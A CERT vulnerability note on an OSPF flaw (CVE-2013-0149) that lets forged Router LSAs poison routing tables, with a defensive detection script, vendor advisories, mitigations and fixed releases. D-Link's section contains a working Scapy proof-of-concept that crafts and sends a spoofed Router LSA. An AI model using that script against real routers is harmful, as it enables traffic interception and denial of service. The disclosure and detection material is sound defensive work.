
CERT Coordination Center

Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers

Vulnerability Note VU#229804

Original Release Date: 2013-08-02 | Last Revised: 2013-12-06

Overview

The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack.

Description

CWE-694: Use of Multiple Resources with a Duplicate Identifier

The OSPF protocol requires LSAs to be identified by three fields: LS Type, Advertising Router, and Link State ID. However, during the routing table calculation phase, the specification states that an LSA is queried in the LSA database using only the Link State ID. Since the Link State ID is used in the LSA database to identify a particular router, a malformed duplicate entry can cause unexpected and insecure implementation-specific behavior.

In some implementations, the vulnerability can allow an attacker to subvert the routing table of a victim router by sending false link state advertisements on behalf of other routers. This subversion can cause the victim router to drop the entire table (denial of service) or to re-route traffic on the network.
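
A defensive check for the condition the vendor statements below describe, a Router LSA (type 1) whose Link State ID differs from its Advertising Router. This is an added example, not CERT's or any vendor's code; it assumes the OSPFv2 header layouts of RFC 2328 Appendix A, and the sample packet is constructed from documentation addresses with zeroed checksums.

```python
import ipaddress
import struct

# OSPFv2 wire layouts from RFC 2328, Appendix A.
OSPF_HDR = struct.Struct("!BBH4s4sHH8s")  # ver, type, len, router id, area, cksum, autype, auth
LSA_HDR = struct.Struct("!HBB4s4sIHH")    # age, options, type, ls id, adv router, seq, cksum, len
LS_UPDATE = 4    # OSPF packet type: Link State Update
ROUTER_LSA = 1   # LS type 1
AUTH_NAMES = {0: "null", 1: "simple password", 2: "cryptographic"}


def ip(raw):
    """Dotted-quad string for 4 raw bytes."""
    return str(ipaddress.IPv4Address(raw))


def inspect_ls_update(pkt):
    """Report sender, auth type, and Router LSAs with LS ID != Advertising Router.

    pkt starts at the OSPF header (the IP header is already stripped).
    """
    if len(pkt) < OSPF_HDR.size:
        raise ValueError("truncated OSPF header")
    version, ptype, length, rid, _area, _ck, autype, _auth = OSPF_HDR.unpack_from(pkt)
    if version != 2:
        raise ValueError("not OSPFv2")
    report = {"sender": ip(rid), "auth": AUTH_NAMES.get(autype, "unknown"),
              "mismatched": []}
    if ptype != LS_UPDATE:
        return report
    end = min(length, len(pkt))          # never read past the captured bytes
    offset = OSPF_HDR.size + 4           # LSA list follows the 4-byte LSA count
    if end < offset:
        raise ValueError("truncated LS Update")
    (count,) = struct.unpack_from("!I", pkt, OSPF_HDR.size)
    for _ in range(count):
        if offset + LSA_HDR.size > end:
            raise ValueError("LSA header runs past end of packet")
        _age, _opt, ls_type, ls_id, adv, seq, _ck, lsa_len = LSA_HDR.unpack_from(pkt, offset)
        if lsa_len < LSA_HDR.size or offset + lsa_len > end:
            raise ValueError("bad LSA length")
        # For a Router LSA the Link State ID is the originating router's ID,
        # so it must equal Advertising Router. Other LS types legitimately differ.
        if ls_type == ROUTER_LSA and ls_id != adv:
            report["mismatched"].append({"link_state_id": ip(ls_id),
                                         "advertising_router": ip(adv),
                                         "seq": seq})
        offset += lsa_len
    return report


# --- Constructed sample input (not captured traffic; checksums are zero) ---
def build_lsa(ls_type, ls_id, adv, seq=0x80000001, body=bytes(4)):
    return LSA_HDR.pack(1, 0x22, ls_type,
                        ipaddress.IPv4Address(ls_id).packed,
                        ipaddress.IPv4Address(adv).packed,
                        seq, 0, LSA_HDR.size + len(body)) + body


def build_ls_update(sender, lsas, autype=0):
    payload = struct.pack("!I", len(lsas)) + b"".join(lsas)
    return OSPF_HDR.pack(2, LS_UPDATE, OSPF_HDR.size + len(payload),
                         ipaddress.IPv4Address(sender).packed, bytes(4),
                         0, autype, bytes(8)) + payload


SAMPLE = build_ls_update("192.0.2.1", [
    build_lsa(1, "192.0.2.1", "192.0.2.1"),      # well-formed Router LSA
    build_lsa(1, "192.0.2.3", "198.51.100.11"),  # LS ID != Advertising Router
    build_lsa(2, "192.0.2.9", "192.0.2.1"),      # Network LSA: fields may differ
])

if __name__ == "__main__":
    result = inspect_ls_update(SAMPLE)
    print("sender", result["sender"], "auth", result["auth"])
    for lsa in result["mismatched"]:
        print("mismatched Router LSA:", lsa)
```

A "null" auth value alongside a mismatch is worth alerting on, since several vendor statements below name OSPF MD5 authentication as the mitigation.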

Impact

This vulnerability can allow an attacker to re-route traffic, compromising the confidentiality of the data, or to conduct a denial-of-service attack against a router, dropping all traffic.

Solution

Install Updates
The OSPF protocol is a popular interior routing protocol that is used by many devices and manufacturers. This vulnerability is implementation-specific, so some vendors may not be affected. The list below contains known affected or non-affected vendors. Please consult your network equipment vendor to confirm how they are affected by this vulnerability.

Vendor Information


Brocade

Notified:  June 13, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTED:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
• Brocade MLX Series
• Brocade NetIron XMR Series
• Brocade NetIron CER Series
• Brocade NetIron CES Series

SW Releases with problem resolved
• NetIron 05.2.00k and later
• NetIron 05.3.00f and later
• NetIron 05.4.00e and later
• NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
• Brocade VDX Series

SW Releases with problem resolved
• Network OS 3.0.1c and later
• Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
• Brocade FastIron Series
• Brocade ICX Series
• Brocade TurboIron Series

SW Releases with problem resolved
• FastIron 7.2.02k and later
• FastIron 7.3.00g and later
• FastIron 07.4.00d and later
• FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
• Brocade BigIron RX Series

SW Releases with problem resolved
• BigIron RX 2.7.02p and later
• BigIron RX 02.8.00f and later
• BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
• Brocade ADX Series and JetCore Series

SW Releases with problem resolved
• ServerIron JetCore 10.2.02d
• ServerIron JetCore 11.0.00k
• ServerIron ADX 12.3.01k
• ServerIron ADX 12.4.00k
• ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
• Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
• Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Check Point Software Technologies

Notified:  May 28, 2013 Updated:  October 16, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Cisco Systems, Inc.

Notified:  May 22, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

Cisco has provided patches for this vulnerability, please check the URL below for details.

Vendor References

D-Link Systems, Inc.

Notified:  May 28, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

1.Advisory Information

Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release

2.Vulnerability Information
Class: CWE-694
Impact: Critical
Remotely Exploitable: Possible, but would require access via other product(s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
3.Vulnerability Description
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.

This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.

4.Vulnerable Packages
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units are affected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)

5.Vendor Information, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.

D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:

As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.

First, this vulnerability does not defeat cryptographic (MD5) authentication, we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
OSPF.

Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.

D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.

6.Credits
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with forementioned

7.Technical Description / Proof of Concept Code

7.1.OSPF “Fight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.

Scapy proof of concept attack script

attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004L
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
/OSPF_Hdr(src=attacker_router_id) \
/OSPF_LSUpd(lsalist=[ \
OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
seq=seq_num, linklist=[ \
OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
])
])
send(R3_FALSE_LSA, iface="eth0")

8.Report Timeline
• May 28, 2013 – Notification by CERT of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – CERT notified embargo date changed to July 30
• Jun 6, 2013 – D-Link Request CERT to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – CERT notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to CERT
• July 30, 2013 – D-Link Post Report for affected Products

9.References
[1] CVE-229804-2013.pdf – Owning the Routing Table Part II

10.About D-Link
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
implements and supports unified network solutions that integrate capabilities in switching, wireless,
broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
(www.twitter.com/dlink).

11.Disclaimer
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
Copyright © 2013. D-Link. All Rights Reserved.

References

Authors:
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com

Vendor Information

Please see DLINK-2013-VUL0213.

Enterasys Networks

Notified:  May 28, 2013 Updated:  August 19, 2013

Status

  Affected

Vendor Statement

Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Extreme Networks

Notified:  May 28, 2013 Updated:  July 30, 2013

Status

  Affected

Vendor Statement

Extreme Networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804.

This vulnerability will be fixed in a future EXOS release.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation

Notified:  May 28, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

IBM has provided updates for multiple products, please check the URLs below for details.

Vendor References

Juniper Networks, Inc.

Notified:  May 10, 2013 Updated:  December 03, 2013

Status

  Affected

Vendor Statement

LEGACY ADVISORY ID:

PSN-2013-08-987

PRODUCT AFFECTED:
All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software

PROBLEM:
A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue.

The issue lies in the OSPF protocol (RFC 2328: http://www.rfc-editor.org/rfc/rfc2328.txt). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow for an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF.

This issue was discovered by an external security researcher.

No other Juniper Networks products or platforms are affected by this issue.

This issue has been assigned CVE-2013-0149.

SOLUTION:
Releases containing (or will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue.

Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'.

All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code.

Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a.

This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS).

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies.

WORKAROUND:
Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value.

It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary.

Customers who wish to request a hotfix for this issue on JunosE may do so by contacting JTAC.
IMPLEMENTATION:

RELATED LINKS:
KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.
Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
CVE-2013-0149

CVSS SCORE:
7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C)

RISK LEVEL:
High

RISK ASSESSMENT:
This issue could allow a remote attacker the ability to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic.

ACKNOWLEDGEMENTS:
Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

NEC Corporation

Notified:  May 28, 2013 Updated:  September 10, 2013

Status

  Affected

Vendor Statement

We provide information on this issue at the following URL: http://jpn.nec.com/security-info/secinfo/nv13-006.html (only in Japanese)

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Oracle Corporation

Notified:  May 28, 2013 Updated:  October 16, 2013

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

Vendor References

Vyatta

Notified:  May 10, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165- A SEVERITY: Low – Informational

PRODUCTS AFFECTED:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc.
The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state
ID & router ID in the LSA is not same; leading to corruption of routing table in the routers.
The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a
legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing
already.

WORKAROUND
There is no workaround. However if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
• Brocade MLX Series
• Brocade NetIron XMR Series
• Brocade NetIron CER Series
• Brocade NetIron CES Series

SW Releases with problem resolved
• NetIron 05.2.00k and later
• NetIron 05.3.00f and later
• NetIron 05.4.00e and later
• NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
• Brocade VDX Series

SW Releases with problem resolved
• Network OS 3.0.1c and later
• Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
• Brocade FastIron Series
• Brocade ICX Series
• Brocade TurboIron Series

SW Releases with problem resolved
• FastIron 7.2.02k and later
• FastIron 7.3.00g and later
• FastIron 07.4.00d and later
• FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
• Brocade BigIron RX Series

SW Releases with problem resolved
• BigIron RX 2.7.02p and later
• BigIron RX 02.8.00f and later
• BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
• Brocade ADX Series and JetCore Series

SW Releases with problem resolved
• ServerIron JetCore 10.2.02d
• ServerIron JetCore 11.0.00k
• ServerIron ADX 12.3.01k
• ServerIron ADX 12.4.00k
• ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
• Brocade Vyatta vRouter

For customers running on Amazon Web
Services this problem has been resolved.
SW Releases with problem resolved
• Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Yamaha Corporation

Notified:  May 28, 2013 Updated:  August 05, 2013

Status

  Affected

Vendor Statement

Yamaha Corporation provides information on this issue at the following URL. (Japanese only)

http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

ACME Packet

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Buffalo Inc

Notified:  May 30, 2013 Updated:  September 12, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Fortinet, Inc.

Notified:  May 28, 2013 Updated:  August 19, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

FreeBSD Project

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Global Technology Associates, Inc.

Notified:  May 28, 2013 Updated:  July 30, 2013

Statement Date:   July 30, 2013

Status

  Not Affected

Vendor Statement

GTA's GB-OS based firewalls are not affected by this (VU#229804 - OSPF) vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hitachi

Notified:  May 28, 2013 Updated:  July 31, 2013

Status

  Not Affected

Vendor Statement

Hitachi Information for VU#229804

AlaxalA AX series
(AX8600R/AX6000S/AX3800S/AX3600S/AX2500S/AX2200S/AX1200S/AX7800S/AX7800R)
are not vulnerable to this issue.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Huawei Technologies

Notified:  May 10, 2013 Updated:  August 22, 2013

Status

  Not Affected

Vendor Statement

Huawei network devices are not affected by this (VU#229804 - OSPF) vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intel Corporation

Notified:  May 22, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

McAfee

Notified:  May 28, 2013 Updated:  October 16, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Palo Alto Networks

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Quagga

Notified:  May 23, 2013 Updated:  August 05, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Quagga is not affected by this vulnerability but the vendor has provided a patch to prevent rebroadcasting of malformed LSAs.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

VMware

Notified:  May 28, 2013 Updated:  July 18, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Watchguard Technologies, Inc.

Notified:  May 28, 2013 Updated:  August 06, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

eSoft, Inc.

Notified:  May 28, 2013 Updated:  July 30, 2013

Status

  Not Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

ACCESS

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

AT&T

Notified:  June 06, 2013 Updated:  June 06, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Alcatel-Lucent

Notified:  May 10, 2013 Updated:  May 10, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Apple Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Avaya, Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Barracuda Networks

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Belkin, Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Blue Coat Systems

Notified:  June 06, 2013 Updated:  June 06, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Borderware Technologies

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

CA Technologies

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Charlotte's Web Networks

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Computer Emergency Response Team Australia

Notified:  May 30, 2013 Updated:  May 30, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Conectiva Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Cray Inc.

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Debian GNU/Linux

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

Dell Computer Corporation, Inc.

Notified:  May 10, 2013 Updated:  May 10, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

DragonFly BSD Project

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

  Unknown

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor References

EMC Corporation

Notified:  May 28, 2013 Updated:  May 28, 2013

Status

                                      Unknown

                                    Vendor Statement

                                    No statement is currently available from the vendor regarding this vulnerability.

                                    Vendor References

                                      Engarde Secure Linux

                                      Notified:  May 28, 2013 Updated:  May 28, 2013

                                      Status

                                        Unknown

                                      Vendor Statement

                                      No statement is currently available from the vendor regarding this vulnerability.

                                      Vendor References

                                        Ericsson

                                        Notified:  June 06, 2013 Updated:  June 06, 2013

                                        Status

                                          Unknown

                                        Vendor Statement

                                        No statement is currently available from the vendor regarding this vulnerability.

                                        Vendor References

                                          F5 Networks, Inc.

                                          Notified:  May 28, 2013 Updated:  May 28, 2013

                                          Status

                                            Unknown

                                          Vendor Statement

                                          No statement is currently available from the vendor regarding this vulnerability.

                                          Vendor References

                                            Fedora Project

                                            Notified:  May 28, 2013 Updated:  May 28, 2013

                                            Status

                                              Unknown

                                            Vendor Statement

                                            No statement is currently available from the vendor regarding this vulnerability.

                                            Vendor References

                                              Force10 Networks, Inc.

                                              Notified:  May 28, 2013 Updated:  May 28, 2013

                                              Status

                                                Unknown

                                              Vendor Statement

                                              No statement is currently available from the vendor regarding this vulnerability.

                                              Vendor References

                                                Fujitsu

                                                Notified:  May 28, 2013 Updated:  May 28, 2013

                                                Status

                                                  Unknown

                                                Vendor Statement

                                                No statement is currently available from the vendor regarding this vulnerability.

                                                Vendor References

                                                  Gentoo Linux

                                                  Notified:  June 06, 2013 Updated:  June 06, 2013

                                                  Status

                                                    Unknown

                                                  Vendor Statement

                                                  No statement is currently available from the vendor regarding this vulnerability.

                                                  Vendor References

                                                    Google

                                                    Notified:  May 28, 2013 Updated:  May 28, 2013

                                                    Status

                                                      Unknown

                                                    Vendor Statement

                                                    No statement is currently available from the vendor regarding this vulnerability.

                                                    Vendor References

                                                      Hewlett-Packard Company

